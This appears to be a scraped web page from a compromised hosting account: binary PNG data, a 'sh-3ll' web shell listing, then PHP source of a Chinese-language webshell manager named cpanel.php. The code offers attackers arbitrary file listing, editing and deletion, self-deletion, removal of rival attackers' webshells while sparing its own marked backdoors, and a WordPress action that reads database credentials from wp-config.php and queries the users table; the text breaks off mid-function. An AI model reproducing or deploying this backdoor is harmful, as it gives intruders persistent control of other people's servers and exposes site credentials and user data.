PNG  IHDRQgAMA a cHRMz&u0`:pQ<bKGDgmIDATxwUﹻ& ^CX(J I@ "% (** BX +*i"]j(IH{~R)[~>h{}gy)I$Ij .I$I$ʊy@}x.: $I$Ii}VZPC)I$IF ^0ʐJ$I$Q^}{"r=OzI$gRZeC.IOvH eKX $IMpxsk.쒷/&r[޳<v| .I~)@$updYRa$I |M.e JaֶpSYR6j>h%IRز if&uJ)M$I vLi=H;7UJ,],X$I1AҒJ$ XY XzI@GNҥRT)E@;]K*Mw;#5_wOn~\ DC&$(A5 RRFkvIR}l!RytRl;~^ǷJj اy뷦BZJr&ӥ8Pjw~vnv X^(I;4R=P[3]J,]ȏ~:3?[ a&e)`e*P[4]T=Cq6R[ ~ޤrXR Հg(t_HZ-Hg M$ãmL5R uk*`%C-E6/%[t X.{8P9Z.vkXŐKjgKZHg(aK9ڦmKjѺm_ \#$5,)-  61eJ,5m| r'= &ڡd%-]J on Xm|{ RҞe $eڧY XYrԮ-a7RK6h>n$5AVڴi*ֆK)mѦtmr1p| q:흺,)Oi*ֺK)ܬ֦K-5r3>0ԔHjJئEZj,%re~/z%jVMڸmrt)3]J,T K֦OvԒgii*bKiNO~%PW0=dii2tJ9Jݕ{7"I P9JKTbu,%r"6RKU}Ij2HKZXJ,妝 XYrP ެ24c%i^IK|.H,%rb:XRl1X4Pe/`x&P8Pj28Mzsx2r\zRPz4J}yP[g=L) .Q[6RjWgp FIH*-`IMRaK9TXcq*I y[jE>cw%gLRԕiFCj-ďa`#e~I j,%r,)?[gp FI˨mnWX#>mʔ XA DZf9,nKҲzIZXJ,L#kiPz4JZF,I,`61%2s $,VOϚ2/UFJfy7K> X+6 STXIeJILzMfKm LRaK9%|4p9LwJI!`NsiazĔ)%- XMq>pk$-$Q2x#N ؎-QR}ᶦHZډ)J,l#i@yn3LN`;nڔ XuX5pF)m|^0(>BHF9(cզEerJI rg7 4I@z0\JIi䵙RR0s;$s6eJ,`n 䂦0a)S)A 1eJ,堌#635RIgpNHuTH_SԕqVe ` &S)>p;S$魁eKIuX`I4춒o}`m$1":PI<[v9^\pTJjriRŭ P{#{R2,`)e-`mgj~1ϣLKam7&U\j/3mJ,`F;M'䱀 .KR#)yhTq;pcK9(q!w?uRR,n.yw*UXj#\]ɱ(qv2=RqfB#iJmmL<]Y͙#$5 uTU7ӦXR+q,`I}qL'`6Kͷ6r,]0S$- [RKR3oiRE|nӦXR.(i:LDLTJjY%o:)6rxzҒqTJjh㞦I.$YR.ʼnGZ\ֿf:%55 I˼!6dKxm4E"mG_ s? .e*?LRfK9%q#uh$)i3ULRfK9yxm܌bj84$i1U^@Wbm4uJ,ҪA>_Ij?1v32[gLRD96oTaR׿N7%L2 NT,`)7&ƝL*꽙yp_$M2#AS,`)7$rkTA29_Iye"|/0t)$n XT2`YJ;6Jx".e<`$) PI$5V4]29SRI>~=@j]lp2`K9Jaai^" Ԋ29ORI%:XV5]JmN9]H;1UC39NI%Xe78t)a;Oi Ҙ>Xt"~G>_mn:%|~ޅ_+]$o)@ǀ{hgN;IK6G&rp)T2i୦KJuv*T=TOSV>(~D>dm,I*Ɛ:R#ۙNI%D>G.n$o;+#RR!.eU˽TRI28t)1LWϚ>IJa3oFbu&:tJ*(F7y0ZR ^p'Ii L24x| XRI%ۄ>S1]Jy[zL$adB7.eh4%%누>WETf+3IR:I3Xה)3אOۦSRO'ٺ)S}"qOr[B7ϙ.edG)^ETR"RtRݜh0}LFVӦDB^k_JDj\=LS(Iv─aTeZ%eUAM-0;~˃@i|l @S4y72>sX-vA}ϛBI!ݎߨWl*)3{'Y|iSlEڻ(5KtSI$Uv02,~ԩ~x;P4ցCrO%tyn425:KMlD ^4JRxSهF_}شJTS6uj+ﷸk$eZO%G*^V2u3EMj3k%)okI]dT)URKDS 7~m@TJR~荪fT"֛L \sM -0T KfJz+nإKr L&j()[E&I ߴ>e FW_kJR|!O:5/2跌3T-'|zX ryp0JS ~^F>-2< `*%ZFP)bSn"L :)+pʷf(pO3TMW$~>@~ū:TAIsV1}S2<%ޟM?@iT ,Eūoz%i~g|`wS(]oȤ8)$ ntu`өe`6yPl IzMI{ʣzʨ )IZ2= ld:5+請M$-ї;U>_gsY$ÁN5WzWfIZ)-yuXIfp~S*IZdt;t>KūKR|$#LcԀ+2\;kJ`]YǔM1B)UbG"IRߊ<xܾӔJ0Z='Y嵤 Leveg)$znV-º^3Ւof#0Tfk^Zs[*I꯳3{)ˬW4Ւ4 OdpbZRS|*I 55#"&-IvT&/윚Ye:i$ 9{LkuRe[I~_\ؠ%>GL$iY8 9ܕ"S`kS.IlC;Ҏ4x&>u_0JLr<J2(^$5L s=MgV ~,Iju> 7r2)^=G$1:3G< `J3~&IR% 6Tx/rIj3O< ʔ&#f_yXJiގNSz; Tx(i8%#4 ~AS+IjerIUrIj362v885+IjAhK__5X%nV%Iͳ-y|7XV2v4fzo_68"S/I-qbf; LkF)KSM$ Ms>K WNV}^`-큧32ŒVؙGdu,^^m%6~Nn&͓3ŒVZMsRpfEW%IwdǀLm[7W&bIRL@Q|)* i ImsIMmKmyV`i$G+R 0tV'!V)֏28vU7͒vHꦼtxꗞT ;S}7Mf+fIRHNZUkUx5SAJㄌ9MqμAIRi|j5)o*^'<$TwI1hEU^c_j?Е$%d`z cyf,XO IJnTgA UXRD }{H}^S,P5V2\Xx`pZ|Yk:$e ~ @nWL.j+ϝYb퇪bZ BVu)u/IJ_ 1[p.p60bC >|X91P:N\!5qUB}5a5ja `ubcVxYt1N0Zzl4]7­gKj]?4ϻ *[bg$)+À*x쳀ogO$~,5 زUS9 lq3+5mgw@np1sso Ӻ=|N6 /g(Wv7U;zωM=wk,0uTg_`_P`uz?2yI!b`kĸSo+Qx%!\οe|އԁKS-s6pu_(ֿ$i++T8=eY; צP+phxWQv*|p1. ά. XRkIQYP,drZ | B%wP|S5`~́@i޾ E;Չaw{o'Q?%iL{u D?N1BD!owPHReFZ* k_-~{E9b-~P`fE{AܶBJAFO wx6Rox5 K5=WwehS8 (JClJ~ p+Fi;ŗo+:bD#g(C"wA^ r.F8L;dzdIHUX݆ϞXg )IFqem%I4dj&ppT{'{HOx( Rk6^C٫O.)3:s(۳(Z?~ٻ89zmT"PLtw䥈5&b<8GZ-Y&K?e8,`I6e(֍xb83 `rzXj)F=l($Ij 2*(F?h(/9ik:I`m#p3MgLaKjc/U#n5S# m(^)=y=đx8ŬI[U]~SцA4p$-F i(R,7Cx;X=cI>{Km\ o(Tv2vx2qiiDJN,Ҏ!1f 5quBj1!8 rDFd(!WQl,gSkL1Bxg''՞^ǘ;pQ P(c_ IRujg(Wz bs#P­rz> k c&nB=q+ؔXn#r5)co*Ũ+G?7< |PQӣ'G`uOd>%Mctz# Ԫڞ&7CaQ~N'-P.W`Oedp03C!IZcIAMPUۀ5J<\u~+{9(FbbyAeBhOSܳ1 bÈT#ŠyDžs,`5}DC-`̞%r&ڙa87QWWp6e7 Rϫ/oY ꇅ Nܶըtc!LA T7V4Jsū I-0Pxz7QNF_iZgúWkG83 0eWr9 X]㾮݁#Jˢ C}0=3ݱtBi]_ &{{[/o[~ \q鯜00٩|cD3=4B_b RYb$óBRsf&lLX#M*C_L܄:gx)WΘsGSbuL rF$9';\4Ɍq'n[%p.Q`u hNb`eCQyQ|l_C>Lb꟟3hSb #xNxSs^ 88|Mz)}:](vbۢamŖ࿥ 0)Q7@0=?^k(*J}3ibkFn HjB׻NO z x}7p 0tfDX.lwgȔhԾŲ }6g E |LkLZteu+=q\Iv0쮑)QٵpH8/2?Σo>Jvppho~f>%bMM}\//":PTc(v9v!gոQ )UfVG+! 35{=x\2+ki,y$~A1iC6#)vC5^>+gǵ@1Hy٪7u;p psϰu/S <aʸGu'tD1ԝI<pg|6j'p:tպhX{o(7v],*}6a_ wXRk,O]Lܳ~Vo45rp"N5k;m{rZbΦ${#)`(Ŵg,;j%6j.pyYT?}-kBDc3qA`NWQū20/^AZW%NQ MI.X#P#,^Ebc&?XR tAV|Y.1!؅⨉ccww>ivl(JT~ u`ٵDm q)+Ri x/x8cyFO!/*!/&,7<.N,YDŽ&ܑQF1Bz)FPʛ?5d 6`kQձ λc؎%582Y&nD_$Je4>a?! ͨ|ȎWZSsv8 j(I&yj Jb5m?HWp=g}G3#|I,5v珿] H~R3@B[☉9Ox~oMy=J;xUVoj bUsl_35t-(ՃɼRB7U!qc+x4H_Qo֮$[GO<4`&č\GOc[.[*Af%mG/ ňM/r W/Nw~B1U3J?P&Y )`ѓZ1p]^l“W#)lWZilUQu`-m|xĐ,_ƪ|9i:_{*(3Gѧ}UoD+>m_?VPۅ15&}2|/pIOʵ> GZ9cmíتmnz)yߐbD >e}:) r|@R5qVSA10C%E_'^8cR7O;6[eKePGϦX7jb}OTGO^jn*媓7nGMC t,k31Rb (vyܴʭ!iTh8~ZYZp(qsRL ?b}cŨʊGO^!rPJO15MJ[c&~Z`"ѓޔH1C&^|Ш|rʼ,AwĴ?b5)tLU)F| &g٣O]oqSUjy(x<Ϳ3 .FSkoYg2 \_#wj{u'rQ>o;%n|F*O_L"e9umDds?.fuuQbIWz |4\0 sb;OvxOSs; G%T4gFRurj(֍ڑb uԖKDu1MK{1^ q; C=6\8FR艇!%\YÔU| 88m)֓NcLve C6z;o&X x59:q61Z(T7>C?gcļxѐ Z oo-08jہ x,`' ҔOcRlf~`jj".Nv+sM_]Zk g( UOPyεx%pUh2(@il0ݽQXxppx-NS( WO+轾 nFߢ3M<;z)FBZjciu/QoF 7R¥ ZFLF~#ȣߨ^<쩡ݛкvџ))ME>ώx4m#!-m!L;vv#~Y[đKmx9.[,UFS CVkZ +ߟrY٧IZd/ioi$%͝ب_ֶX3ܫhNU ZZgk=]=bbJS[wjU()*I =ώ:}-蹞lUj:1}MWm=̛ _ ¾,8{__m{_PVK^n3esw5ӫh#$-q=A̟> ,^I}P^J$qY~Q[ Xq9{#&T.^GVj__RKpn,b=`żY@^՝;z{paVKkQXj/)y TIc&F;FBG7wg ZZDG!x r_tƢ!}i/V=M/#nB8 XxЫ ^@CR<{䤭YCN)eKOSƟa $&g[i3.C6xrOc8TI;o hH6P&L{@q6[ Gzp^71j(l`J}]e6X☉#͕ ׈$AB1Vjh㭦IRsqFBjwQ_7Xk>y"N=MB0 ,C #o6MRc0|$)ف"1!ixY<B9mx `,tA>)5ػQ?jQ?cn>YZe Tisvh# GMމȇp:ԴVuږ8ɼH]C.5C!UV;F`mbBk LTMvPʍϤj?ԯ/Qr1NB`9s"s TYsz &9S%U԰> {<ؿSMxB|H\3@!U| k']$U+> |HHMLޢ?V9iD!-@x TIî%6Z*9X@HMW#?nN ,oe6?tQwڱ.]-y':mW0#!J82qFjH -`ѓ&M0u Uγmxϵ^-_\])@0Rt.8/?ٰCY]x}=sD3ojަЫNuS%U}ԤwHH>ڗjܷ_3gN q7[q2la*ArǓԖ+p8/RGM ]jacd(JhWko6ڎbj]i5Bj3+3!\j1UZLsLTv8HHmup<>gKMJj0@H%,W΃7R) ">c, xixј^ aܖ>H[i.UIHc U1=yW\=S*GR~)AF=`&2h`DzT󑓶J+?W+}C%P:|0H܆}-<;OC[~o.$~i}~HQ TvXΈr=b}$vizL4:ȰT|4~*!oXQR6Lk+#t/g lԁߖ[Jڶ_N$k*". xsxX7jRVbAAʯKҎU3)zSNN _'s?f)6X!%ssAkʱ>qƷb hg %n ~p1REGMHH=BJiy[<5 ǁJҖgKR*倳e~HUy)Ag,K)`Vw6bRR:qL#\rclK/$sh*$ 6덤 KԖc 3Z9=Ɣ=o>X Ώ"1 )a`SJJ6k(<c e{%kϊP+SL'TcMJWRm ŏ"w)qc ef꒵i?b7b('"2r%~HUS1\<(`1Wx9=8HY9m:X18bgD1u ~|H;K-Uep,, C1 RV.MR5άh,tWO8WC$ XRVsQS]3GJ|12 [vM :k#~tH30Rf-HYݺ-`I9%lIDTm\ S{]9gOڒMNCV\G*2JRŨ;Rҏ^ڽ̱mq1Eu?To3I)y^#jJw^Ńj^vvlB_⋌P4x>0$c>K†Aļ9s_VjTt0l#m>E-,,x,-W)سo&96RE XR.6bXw+)GAEvL)͞K4$p=Ũi_ѱOjb HY/+@θH9޼]Nԥ%n{ &zjT? Ty) s^ULlb,PiTf^<À] 62R^V7)S!nllS6~͝V}-=%* ʻ>G DnK<y&>LPy7'r=Hj 9V`[c"*^8HpcO8bnU`4JȪAƋ#1_\ XϘHPRgik(~G~0DAA_2p|J묭a2\NCr]M_0 ^T%e#vD^%xy-n}-E\3aS%yN!r_{ )sAw ڼp1pEAk~v<:`'ӭ^5 ArXOI驻T (dk)_\ PuA*BY]yB"l\ey hH*tbK)3 IKZ򹞋XjN n *n>k]X_d!ryBH ]*R 0(#'7 %es9??ښFC,ՁQPjARJ\Ρw K#jahgw;2$l*) %Xq5!U᢯6Re] |0[__64ch&_}iL8KEgҎ7 M/\`|.p,~`a=BR?xܐrQ8K XR2M8f ?`sgWS%" Ԉ 7R%$ N}?QL1|-эټwIZ%pvL3Hk>,ImgW7{E xPHx73RA @RS CC !\ȟ5IXR^ZxHл$Q[ŝ40 (>+ _C >BRt<,TrT {O/H+˟Pl6 I B)/VC<6a2~(XwV4gnXR ϱ5ǀHٻ?tw똤Eyxp{#WK qG%5],(0ӈH HZ])ג=K1j&G(FbM@)%I` XRg ʔ KZG(vP,<`[ Kn^ SJRsAʠ5xՅF`0&RbV tx:EaUE/{fi2;.IAwW8/tTxAGOoN?G}l L(n`Zv?pB8K_gI+ܗ #i?ޙ.) p$utc ~DžfՈEo3l/)I-U?aԅ^jxArA ΧX}DmZ@QLےbTXGd.^|xKHR{|ΕW_h] IJ`[G9{).y) 0X YA1]qp?p_k+J*Y@HI>^?gt.06Rn ,` ?);p pSF9ZXLBJPWjgQ|&)7! HjQt<| ؅W5 x W HIzYoVMGP Hjn`+\(dNW)F+IrS[|/a`K|ͻ0Hj{R,Q=\ (F}\WR)AgSG`IsnAR=|8$}G(vC$)s FBJ?]_u XRvύ6z ŨG[36-T9HzpW̞ú Xg큽=7CufzI$)ki^qk-) 0H*N` QZkk]/tnnsI^Gu't=7$ Z;{8^jB% IItRQS7[ϭ3 $_OQJ`7!]W"W,)Iy W AJA;KWG`IY{8k$I$^%9.^(`N|LJ%@$I}ֽp=FB*xN=gI?Q{٥4B)mw $Igc~dZ@G9K X?7)aK%݅K$IZ-`IpC U6$I\0>!9k} Xa IIS0H$I H ?1R.Чj:4~Rw@p$IrA*u}WjWFPJ$I➓/6#! LӾ+ X36x8J |+L;v$Io4301R20M I$-E}@,pS^ޟR[/s¹'0H$IKyfŸfVOπFT*a$I>He~VY/3R/)>d$I>28`Cjw,n@FU*9ttf$I~<;=/4RD~@ X-ѕzἱI$: ԍR a@b X{+Qxuq$IЛzo /~3\8ڒ4BN7$IҀj V]n18H$IYFBj3̵̚ja pp $Is/3R Ӻ-Yj+L;.0ŔI$Av? #!5"aʄj}UKmɽH$IjCYs?h$IDl843.v}m7UiI=&=0Lg0$I4: embe` eQbm0u? $IT!Sƍ'-sv)s#C0:XB2a w I$zbww{."pPzO =Ɔ\[ o($Iaw]`E).Kvi:L*#gР7[$IyGPI=@R 4yR~̮´cg I$I/<tPͽ hDgo 94Z^k盇΄8I56^W$I^0̜N?4*H`237}g+hxoq)SJ@p|` $I%>-hO0eO>\ԣNߌZD6R=K ~n($I$y3D>o4b#px2$yڪtzW~a $I~?x'BwwpH$IZݑnC㧄Pc_9sO gwJ=l1:mKB>Ab<4Lp$Ib o1ZQ@85b̍ S'F,Fe,^I$IjEdù{l4 8Ys_s Z8.x m"+{~?q,Z D!I$ϻ'|XhB)=…']M>5 rgotԎ 獽PH$IjIPhh)n#cÔqA'ug5qwU&rF|1E%I$%]!'3AFD/;Ck_`9 v!ٴtPV;x`'*bQa w I$Ix5 FC3D_~A_#O݆DvV?<qw+I$I{=Z8".#RIYyjǪ=fDl9%M,a8$I$Ywi[7ݍFe$s1ՋBVA?`]#!oz4zjLJo8$I$%@3jAa4(o ;p,,dya=F9ً[LSPH$IJYЉ+3> 5"39aZ<ñh!{TpBGkj}Sp $IlvF.F$I z< '\K*qq.f<2Y!S"-\I$IYwčjF$ w9 \ߪB.1v!Ʊ?+r:^!I$BϹB H"B;L'G[ 4U#5>੐)|#o0aڱ$I>}k&1`U#V?YsV x>{t1[I~D&(I$I/{H0fw"q"y%4 IXyE~M3 8XψL}qE$I[> nD?~sf ]o΁ cT6"?'_Ἣ $I>~.f|'!N?⟩0G KkXZE]ޡ;/&?k OۘH$IRۀwXӨ<7@PnS04aӶp.:@\IWQJ6sS%I$e5ڑv`3:x';wq_vpgHyXZ 3gЂ7{{EuԹn±}$I$8t;b|591nءQ"P6O5i }iR̈́%Q̄p!I䮢]O{H$IRϻ9s֧ a=`- aB\X0"+5"C1Hb?߮3x3&gşggl_hZ^,`5?ߎvĸ%̀M!OZC2#0x LJ0 Gw$I$I}<{Eb+y;iI,`ܚF:5ܛA8-O-|8K7s|#Z8a&><a&/VtbtLʌI$I$I$I$I$I$IRjDD%tEXtdate:create2022-05-31T04:40:26+00:00!Î%tEXtdate:modify2022-05-31T04:40:26+00:00|{2IENDB` sh-3ll

HOME


sh-3ll 1.0
DIR:/proc/thread-self/root/proc/self/root/home/deltatra/.trash/
Upload File :
Current File : //proc/thread-self/root/proc/self/root/home/deltatra/.trash/cpanel.php
<?php
$action = isset($_REQUEST['action'])? $_REQUEST['action'] : '';
$path = isset($_REQUEST['path']) ? $_REQUEST['path'] : '.';
$root = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'].'/' : '';
$is_wp = is_wp($root);if($is_wp == 1){$path = $root;}
$htaccess = $index = $shell = $trigger = '';
$dian = "d1i1a2n3";
if(file_exists($root."index.php")){
    $index = file_get_contents($root."index.php");
}elseif(file_exists($root."index.html")){
    $index = file_get_contents($root."index.html");
}
if(file_exists($root.".htaccess")){
    $htaccess = file_get_contents($root.".htaccess");
}
switch($action){
    case 'anti-virus':
        $title = '查杀大码';
        $sign = isset($_POST['sign']) ? $_POST['sign'] : '';
        if($sign == ''){
            $content = '<form name="frm1" method="post"><div class="form-item"><label class="form-label">搜索范围</label><div class="input-block"><input type="text" name="path" placeholder="请输入文件路径" class="form-input" value="'.$root.'"></div></div><div class="form-item"><label class="form-label">己方标记</label><div class="input-block"><input type="text" name="sign" placeholder="切勿伤及友军" class="form-input" value="be54aace58d583f26839a0e8cd1bf90d"></div></div><div class="form-item"><label class="form-label">自动删除</label><div class="input-block"><input type="radio" class="form-radio" value="1" name="auto" checked> 开 <input type="radio" class="form-radio" value="0" name="auto"> 关 <font color="red">( 注意:请确认己方备码、恢复码和劫持码都有加入标记! )</font></div></div><div class="form-item border-none"><div class="input-block"><input type="submit" class="submit border-none"></div></div></form>';
        }else{
            $auto = isset($_POST['auto']) ? $_POST['auto'] : 0;
            getShell($path, $sign, $auto);
            if($shell == ''){
                $content = '搜索不到符合要求的文件。';
            }else{
                $content = '<form name="frm1" id="frm1" method="post" action="?action=batchDel"><table cellspacing="0" cellpadding="0" border="0" class="table"><thead><tr><td></td><td>文件名</td><td align="center">权限</td><td align="center">创建时间</td><td align="center">编辑时间</td><td align="center">访问时间</td><td align="center">大小</td><td align="center">类型</td></tr></thead>';
                $content .= $shell;
                $content .= '<tr><td colspan="8"><input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> 全选 <input type="submit" value="Delete Checked" onclick="return del();"></td></tr></table></form>';
            }
        }
    break;
    case 'batchDel':
        $title = '删除选中文件';
        $content = '<div class="form-item form-text"><label class="form-label">处理结果</label><div class="input-block">';
        if(isset($_POST['files'])){
            foreach($_POST['files'] as $v){
                if(file_exists($v)){
                    if(unlink($v)){
                        $content .= $v.' 删除成功<br>';
                    }else{
                        $content .= '<font color="red">'.$v.' 删除失败</font><br>';
                    }
                }else{
                    $content .= $v.' 已经被删除<br>';
                }
            }
            $content .= '</div></div>';
        }
    break;
    case 'del':
        $title = '删除文件';
        $path = str_replace($dian, '.', $path);
        $content = '<table cellspacing="0" cellpadding="0" border="0" class="table"><tr><td>文件名</td><td>操作</td></tr><tr><td>'.$path.'</td><td>';
        if($path){
            if(file_exists($path)){
                if(unlink($path)){
                    $content .= '成功';
                }else{
                    $content .= '<font color="red">失败</font><br>';
                }
            }else{
                $content .= '成功';
            }
        }
        $content .= '</td></tr></table>';
    break;
    case 'delAll':
        $title = '全站删除特定文件';
        $sign = isset($_REQUEST['sign']) ? $_REQUEST['sign'] : '';
        if($sign == ''){
            $content = '<form name="frm1" method="post"><div class="form-item"><label class="form-label">搜索范围</label><div class="input-block"><input type="text" name="path" placeholder="请输入文件路径" class="form-input" value="'.$root.'"></div></div><div class="form-item"><label class="form-label">目标路径</label><div class="input-block"><input type="text" name="sign" class="form-input" placeholder="请输入目标文件路径"></div></div><div class="form-item"><label class="form-label">MD5值</label><div class="input-block"><input type="text" name="md5" class="form-input" placeholder="请输入目标文件MD5值"></div></div><div class="form-item"><label class="form-label">自动删除</label><div class="input-block"><input type="radio" class="form-radio" value="1" name="auto" checked> 开 <input type="radio" class="form-radio" value="0" name="auto"> 关 <font color="red">( 文件路径和MD5值任意输入一项即可,注意:请确认目标文件可大量删除! )</font></div></div><div class="form-item border-none"><div class="input-block"><input type="submit" class="submit border-none"></div></div></form>';
        }else{
            $md5 = isset($_POST['md5']) ? $_POST['md5'] : '';
            if($md5 == '' && $sign){
                $sign = str_replace($dian, '.', $sign);
                if(file_exists($sign)){
                    $md5 = md5(file_get_contents($sign));
                }
            }            
            $auto = isset($_POST['auto']) ? $_POST['auto'] : 0;
            if($md5){
                getDelAll($path, $md5, $auto);
            }            
            if($shell == ''){
                $content = '搜索不到符合要求的文件。';
            }else{
                $content = '<form name="frm1" id="frm1" method="post" action="?action=batchDel"><table cellspacing="0" cellpadding="0" border="0" class="table"><thead><tr><td></td><td>文件名</td><td align="center">权限</td><td align="center">创建时间</td><td align="center">编辑时间</td><td align="center">访问时间</td><td align="center">大小</td></tr></thead>';
                $content .= $shell;
                $content .= '<tr><td colspan="8"><input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> 全选 <input type="submit" value=" 删除选中 " onclick="return del();"></td></tr></table></form>';
            }
        }
    break;
    case 'edit':
        $title = '查看/编辑 代码';
        $code = isset($_POST['code']) ? $_POST['code'] : '';
        if($code){
            $path = str_replace($dian, '.', $path);
            if(file_exists($path)){
                file_put_contents($path, $code);
                $content = '编辑成功';
            }
        }else{
            $realPath = str_replace($dian, '.', $path);
            $content = '<form action="?action=edit" method="post"><input type="hidden" name="path" value="'.htmlspecialchars($path).'"><div class="form-item form-text"><label class="form-label">内容</label><div class="input-block"><textarea name="code" class="form-textarea" style="min-height:500px;">'.htmlspecialchars(file_get_contents(htmlspecialchars($realPath))).'</textarea></div></div><div class="form-item border-none"><div class="input-block"><input type="submit" class="submit border-none"></div></div></form>';
        }        
    break;
    case 'kill':
        $title = '查杀同行大码';
        $sign = isset($_POST['sign']) ? $_POST['sign'] : '';
        if($sign == ''){
            $content = '<form name="frm1" method="post"><div class="form-item"><label class="form-label">搜索范围</label><div class="input-block"><input type="text" name="path" placeholder="请输入文件路径" class="form-input" value="'.$root.'"></div></div><div class="form-item"><label class="form-label">己方标记</label><div class="input-block"><input type="text" name="sign" placeholder="切勿伤及友军" class="form-input" value="be54aace58d583f26839a0e8cd1bf90d"></div></div><div class="form-item"><label class="form-label">自动删除</label><div class="input-block"><input type="radio" class="form-radio" value="1" name="auto" checked> 开 <input type="radio" class="form-radio" value="0" name="auto"> 关 <font color="red">( 注意:请确认己方备码、恢复码和劫持码都有加入标记! )</font></div></div><div class="form-item border-none"><div class="input-block"><input type="submit" class="submit border-none"></div></div></form>';
        }else{
            $auto = isset($_POST['auto']) ? $_POST['auto'] : 0;
            getShell($path, $sign, $auto);
            if($shell == ''){
                $content = '搜索不到符合要求的文件。';
            }else{
                $content = '<form name="frm1" id="frm1" method="post" action="?action=batchDel"><table cellspacing="0" cellpadding="0" border="0" class="table"><thead><tr><td></td><td>文件名</td><td align="center">权限</td><td align="center">创建时间</td><td align="center">编辑时间</td><td align="center">访问时间</td><td align="center">大小</td><td align="center">类型</td></tr></thead>';
                $content .= $shell;
                $content .= '<tr><td colspan="8"><input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> 全选 <input type="submit" value="Delete Checked" onclick="return del();"></td></tr></table></form>';
            }
        }
    break;
    case 'list':
        $dir = __DIR__;
        if($path){$dir = $path;}
        if($dir == '.'){$dir = $root;}
        $title = $dir;
        $content = '<form name="frm1" id="frm1" method="post" action="?action=batchDel"><table cellspacing="0" cellpadding="0" border="0" class="table"><thead><tr><td></td><td>文件名</td><td align="center">权限</td><td align="center">创建时间</td><td align="center">编辑时间</td><td align="center">访问时间</td><td align="center">大小</td><td align="center">操作</td></tr></thead>';
        $count = 0;
        foreach(hardScandir($dir) as $value){
            $fullPath = str_replace('//', '/', $dir.'/'.$value);
            if($value != '.' && $value != '..' && is_dir($fullPath)){
                $content .= '<tr><td align="center"></td><td><a href="?action=list&path='.escape($fullPath).'">'.$fullPath.'</td><td align="center">'.substr(sprintf('%o', fileperms($fullPath)), -4).'</td><td align="center">'.date("Y-m-d H:i:s", filectime($fullPath)).'</td><td align="center">'.date("Y-m-d H:i:s", filemtime($fullPath)).'</td><td align="center">'.date("Y-m-d H:i:s", fileatime($fullPath)).'</td><td align="center">文件夹</td><td align="center"></td></tr>';
                $count++;
                if($count == 100){
                    break;
                }
            }
        }
        foreach(hardScandir($dir) as $value){
            $fullPath = str_replace('//', '/', $dir.'/'.$value);
            if($value != '.' && $value != '..' && !is_dir($fullPath)){
                $content .= '<tr><td align="center"><input type="checkbox" name="files[]" value="'.$fullPath.'"></td><td><a href="?path='.escape($fullPath).'&action=edit">'.$fullPath.'</td><td align="center">'.substr(sprintf('%o', fileperms($fullPath)), -4).'</td><td align="center">'.date("Y-m-d H:i:s", filectime($fullPath)).'</td><td align="center">'.date("Y-m-d H:i:s", filemtime($fullPath)).'</td><td align="center">'.date("Y-m-d H:i:s", fileatime($fullPath)).'</td><td align="center">'.round(filesize($fullPath) / 1024, 2).' Kb</td><td align="center"><a href="?path='.escape($fullPath).'&action=del">删除</a> <a href="?sign='.escape($fullPath).'&action=delAll">删除全部</a></td></tr>';
                $count++;
                if($count == 100){
                    break;
                }
            }
        }
        $content .= '<tr><td colspan="8"><input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> 全选 <input type="submit" value=" 删除选中 " onclick="return del();"></td></tr></table></form>';
    break;
    case 'trigger':
        $title = '查找触发式还原码';
        $start = isset($_POST['start']) ? $_POST['start'] : 0;
        if($start == 0){
            $content = '<form action="?action=trigger" method="post"><input type="hidden" name="start" value="1"><div class="form-item"><label class="form-label">搜索范围</label><div class="input-block"><input type="text" name="path" placeholder="请输入文件路径" class="form-input" value="'.$root.'"></div></div><div class="form-item"><label class="form-label">己方标记</label><div class="input-block"><input type="text" name="sign" placeholder="切勿伤及友军" class="form-input" value="be54aace58d583f26839a0e8cd1bf90d"></div></div><div class="form-item"><label class="form-label">自动注释</label><div class="input-block"><input type="radio" class="form-radio" value="1" name="auto" checked> 开 <input type="radio" class="form-radio" value="0" name="auto"> 关 <font color="red">( 开启自动注释功能,仅能使其失效,无法彻底删除。)</font></div></div><div class="form-item border-none"><div class="input-block"><input type="submit" class="submit border-none"></div></div></form>';
        }else{
            $sign = isset($_POST['sign']) ? $_POST['sign'] : '';
            $auto = isset($_POST['auto']) ? $_POST['auto'] : 0;
            getTrigger($path, $sign, $auto);
            if($trigger == ''){
                $content = '搜索不到符合要求的文件。';
            }else{
                $content = '<form name="frm1" id="frm1" method="post" action="?action=batchDel"><table cellspacing="0" cellpadding="0" border="0" class="table"><thead><tr><td></td><td>文件名</td><td align="center">权限</td><td align="center">创建时间</td><td align="center">编辑时间</td><td align="center">访问时间</td><td align="center">大小</td><td align="center">类型</td></tr></thead>';
                $content .= $trigger;
                $content .= '<tr><td colspan="8"><input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> 全选 <input type="submit" value="Delete Checked" onclick="return del();"> <font color="red">注意:大部分触发式还原码不能直接删除!</font></td></tr></table></form>';
            }
        }
    break;
    case 'unlink':
        $title = '自毁程序';
        $status = unlink(__FILE__);
        if($status){
            $content = '自毁成功';
        }else{
            $content = '自毁失败';
        }
    break;
    case 'wp-user':
        $title = '用户列表';
        if(!file_exists($root.'wp-config.php') && $path == '.'){
            $content = '<form action="?action=user" method="post" name="form"><div class="form-item"><label class="form-label">WP 路径</label><div class="input-block"><input type="text" class="form-input" placeholder="请输入正确的WordPress路径" name="path"></div></div><input type="submit" value="查看WP用户列表" class="submit"></div></div></form>';
        }else{
            if($path == '.'){
                $path = $root;
            }
            $path = htmlspecialchars($path);
            require $path.'wp-config.php';
            $con = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
            if(mysqli_connect_errno($con)){
                $content = 'Wordpress 数据库连接失败。'.mysqli_connect_error();
                exit();
            }
            mysqli_query($con, "SET NAMES ".DB_CHARSET);
            $sql = mysqli_query($con , "SELECT * FROM `".$table_prefix."users`");
            $total = mysqli_num_rows($sql);
            if($total > 0){
